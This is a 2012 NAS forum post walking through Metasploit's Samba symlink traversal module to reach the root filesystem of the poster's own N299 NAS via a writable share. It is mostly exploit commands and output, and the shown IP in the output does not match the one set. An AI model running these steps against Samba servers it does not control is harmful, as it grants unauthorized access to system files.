General NAS-Central Forums

Welcome to the NAS community
It is currently Tue Jun 27, 2017 7:01 am

All times are UTC




Post new topic Reply to topic  [ 1 post ] 
Author Message
PostPosted: Sat Oct 06, 2012 9:15 am 
Offline

Joined: Thu Oct 04, 2012 1:50 pm
Posts: 1
NOTE: Because Video folder is scanned by Media Server you must stop it from NAS menu before this exploit.
In order to access root filesystem of N299 we will use linux Back Track.

Launch a terminal window and from the terminal we run
Code:
msfconsole
.
After some loading the prompt will be msf >.
At this prompt we type search samba and we wil have a list with available exploits:

Code:
msf > search samba


The command will list all available exloits.
Load the first one with the command:
Code:
msf > use auxiliary/admin/smb/samba_symlink_traversal


Let's see what are the options:
Code:
sf  auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem



Let's set the options:

Code:
msf  auxiliary(samba_symlink_traversal) > set RHOST 192.168.1.2 (change the IP addres with your own NAS IP addres)
msf  auxiliary(samba_symlink_traversal) > set SMBSHARE Video (I set the Video folder from NAS menu to be writtable for everyone)
msf  auxiliary(samba_symlink_traversal) > set RPORT 139
msf  auxiliary(samba_symlink_traversal) > set SMBTARGET roothack (the folder were the root directory will be mount in the Video folder)


Now we run the command exploit:
Code:
msf  auxiliary(samba_symlink_traversal) > exploit

Connecting to the server...
Trying to mount writeable share 'Video'...
Trying to link 'roothack' to the root filesystem...
Now access the following share to browse the root filesystem: \10.1.10.10\Video\roothack\
Auxiliary module execution completed


Now if you go to network folder Video you will see a folder roothack with all the files of root filesistem


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 1 post ] 

All times are UTC


Who is online

Users browsing this forum: No registered users and 1 guest


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Powered by phpBB® Forum Software © phpBB Group